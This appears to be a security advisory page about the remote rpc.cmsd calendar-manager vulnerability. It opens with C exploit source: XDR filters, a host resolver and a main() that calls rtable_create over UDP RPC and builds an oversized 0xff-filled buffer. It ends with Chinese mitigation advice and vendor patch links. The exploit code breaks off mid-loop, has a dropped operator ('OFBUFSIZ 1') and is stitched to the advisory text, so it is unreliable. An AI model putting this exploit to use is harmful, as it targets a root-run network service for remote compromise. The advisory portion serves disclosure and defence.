if (!xdr_Buffer(xdrs, &objp->target))
return (FALSE);
if (!xdr_Buffer(xdrs, &objp->new_target))
return (FALSE);
return (TRUE);
}
/*
 * XDR filter for Table_Status.
 *
 * Hands the object to xdr_enum() and reports its result as TRUE/FALSE.
 * The cast relies on Table_Status having the same representation as
 * enum_t (NOTE(review): usual rpcgen assumption, confirm against the
 * type's declaration).
 *
 * xdr_enum() does not check a decoded value against the members of the
 * enum, so a caller that decodes a reply from an untrusted peer should
 * range-check the value before switching on it or using it as an index.
 */
bool_t
xdr_Table_Status(xdrs, objp)
	register XDR *xdrs;
	Table_Status *objp;
{
	return (xdr_enum(xdrs, (enum_t *)objp) ? TRUE : FALSE);
}
/*
 * XDR filter for Registration_Status.
 *
 * Hands the object to xdr_enum() and reports its result as TRUE/FALSE.
 * The cast relies on Registration_Status having the same representation
 * as enum_t (NOTE(review): usual rpcgen assumption, confirm against the
 * type's declaration).
 *
 * xdr_enum() does not check a decoded value against the members of the
 * enum, so a value decoded from an untrusted peer should be validated
 * by the caller before use.
 */
bool_t
xdr_Registration_Status(xdrs, objp)
	register XDR *xdrs;
	Registration_Status *objp;
{
	bool_t ok;

	ok = xdr_enum(xdrs, (enum_t *)objp);
	if (ok)
		return (TRUE);
	return (FALSE);
}
/*
* rtable_delete and rtable_change take over the functionality of
* rtable_delete_instance and rtable_change_instance respectively.
* rtable_delete_instance and rtable_change_instance are now dummy
* routines that exist only for backward compatibility and return
* access_notsupported.
*/
/*
 * Forward declarations of the constructor, copy and destructor helpers
 * for the Appt, Abb_Appt, Reminder, Uid, Access_Entry and Attribute
 * types. Their definitions are not part of this listing.
 *
 * Every declaration uses an empty parameter list, which before C23
 * declares a function without a prototype: the compiler checks neither
 * the number nor the types of the arguments at a call site, so a
 * mismatched call compiles silently. Full prototypes would let the
 * compiler catch such calls.
 */
extern Appt* make_appt();
extern void destroy_appt();
extern void destroy_list();
extern Appt *copy_appt();
extern Appt *copy_semiprivate_appt();
extern Abb_Appt *make_abbrev_appt();
extern void destroy_abbrev_appt();
extern Abb_Appt *copy_abbrev_appt();
extern Abb_Appt *appt_to_abbrev();
extern Abb_Appt *appt_to_semiprivate_abbrev();
extern Reminder* make_reminder();
extern void destroy_reminder();
extern Reminder* copy_reminder();
extern Uid* make_keyentry();
extern void destroy_keyentry();
extern Uid* copy_keyentry();
extern Access_Entry* make_access_entry();
extern Access_Entry* copy_access_list();
extern void destroy_access_list();
extern Abb_Appt *copy_single_abbrev_appt();
extern Attribute *make_attr();
/* ----- rpcgen ----- */
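/*
 * Resolve a dotted-quad string or a host name to an IPv4 address.
 *
 * host: NUL-terminated address or name; NULL is rejected.
 *
 * Returns the address as produced by inet_addr()/gethostbyname()
 * (network byte order), widened to unsigned long, or 0 on failure.
 *
 * Changes from the original:
 *  - inet_addr() returns a 32-bit in_addr_t. Storing it in a long and
 *    comparing with -1 never matches where long is 64 bits, so the
 *    failure case went undetected; compare with INADDR_NONE instead.
 *  - The original read the hostent address through an unsigned long
 *    pointer, which reads past the 4-byte IPv4 address where long is
 *    8 bytes and may be misaligned. Copy exactly sizeof(in_addr_t)
 *    bytes after checking the address family and length.
 *  - The nested if/else is written out with braces so the else no
 *    longer depends on dangling-else binding.
 */
unsigned long resolve(char *host)
{
	in_addr_t addr;
	struct hostent *he;

	if (host == NULL) {
		return (0);
	}

	addr = inet_addr(host);
	if (addr != INADDR_NONE) {
		return ((unsigned long)addr);
	}

	/* Not a dotted quad (or the all-ones address): try a name lookup. */
	he = gethostbyname(host);
	if (he == NULL) {
		return (0);
	}

	/* Only accept an IPv4 result of the expected size. */
	if (he->h_addrtype != AF_INET ||
	    he->h_length != (int)sizeof(addr) ||
	    he->h_addr_list == NULL || he->h_addr_list[0] == NULL) {
		return (0);
	}

	memcpy(&addr, he->h_addr_list[0], sizeof(addr));
	return ((unsigned long)addr);
}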
int main(int argc, char *argv[])
{
char obuf[OFBUFSIZ 1], abuf[ALIGN 1];
struct sockaddr_in sin;
struct timeval tv;
Table_Op_Args toa;
Table_Status ts;
Table_Args ta;
Table_Res tr;
Appt ap;
int sock;
unsigned long *ptr;
CLIENT *c;
if(argc!=2)
{
(void)fprintf(stderr,"error: usage: %s <full hostname>\n",argv[0]);
exit(-1);
}
(void)memset(&sin,0,sizeof(sin));
sin.sin_family = AF_INET;
if(!(sin.sin_addr.s_addr=resolve(argv[1])))
{
(void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
exit(-1);
}
(void)memset(&tv,0,sizeof(tv));
tv.tv_sec = 7;
sock = RPC_ANYSOCK;
if(!(c=(CLIENT *)clntudp_create(&sin,TABLEPROG,4,tv,&sock)))
{
(void)clnt_pcreateerror(argv[0]);
exit(1);
}
c->cl_auth = authunix_create(argv[1],0,0,0,0);
(void)memset(&toa,0,sizeof(toa));
toa.target = cname;
(void)memset(&ts,0,sizeof(ts));
if(clnt_call(c,rtable_create,xdr_Table_Op_Args,(caddr_t)&toa,
xdr_Table_Status,(caddr_t)&ts,tv)!=RPC_SUCCESS)
{
(void)clnt_perror(c,"error: rtable_create");
exit(-1);
}
(void)memset(abuf,0xff,sizeof(abuf));
abuf[sizeof(abuf)-1] = 0;
for(ptr=(unsigned long *)obuf;
&nbs
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* NSFOCUS建议您立刻关闭rpc.cmsd服务。方法是在/etc/inetd.conf中注释掉下列行:
100068/2-5 dgram rpc/udp wait root /usr/dt/bin/rpc.cmsd rpc.cmsd
然后重新启动inetd.
厂商补丁:
Caldera
-------
Caldera已经为此发布了一个安全公告(CSSA-2002-SCO.12)以及相应补丁:
CSSA-2002-SCO.12:Open UNIX, UnixWare 7: rpc.cmsd can be remotely exploited
链接:ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12
补丁下载:
Caldera UnixWare 7.1.1:
Caldera Patch erg711942b.Z
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12/
Caldera OpenUnix 8.0:
Caldera Patch erg711942b.Z
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12/
HP
--
HP已经为此发布了一个安全公告(HPSBUX9908-102)以及相应补丁:
HPSBUX9908-102:Security Vulnerability in rpc.cmsd
链接:




